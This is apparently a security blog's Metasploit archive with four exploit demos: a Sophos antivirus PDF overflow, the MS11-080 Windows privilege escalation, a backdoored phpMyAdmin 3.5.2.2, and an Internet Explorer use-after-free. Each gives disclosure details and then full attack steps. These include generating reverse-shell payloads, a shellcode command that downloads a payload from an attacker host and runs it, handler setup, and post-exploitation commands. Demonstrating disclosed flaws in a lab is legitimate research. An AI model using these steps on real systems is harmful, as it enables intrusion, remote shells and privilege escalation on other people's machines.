Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Exploits, Metasploit,

Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler

use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j

6) On the target surf index.html file

7) Exploit the session :)

session -i 1 id /sbin/ifconfig uname -a

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability the 2011-10-11
Metasploit PoC provided the 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

session -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

session -i 2
sysinfo
getuid

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Exploits, Metasploit

Timeline :

Backdoor discovered by Passerby the 2012-09-25
Backdoor presence vendor notification the 2012-09-25
Metasploit PoC provided the 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17

PoC provided by :

unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Affected version(s) :

IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid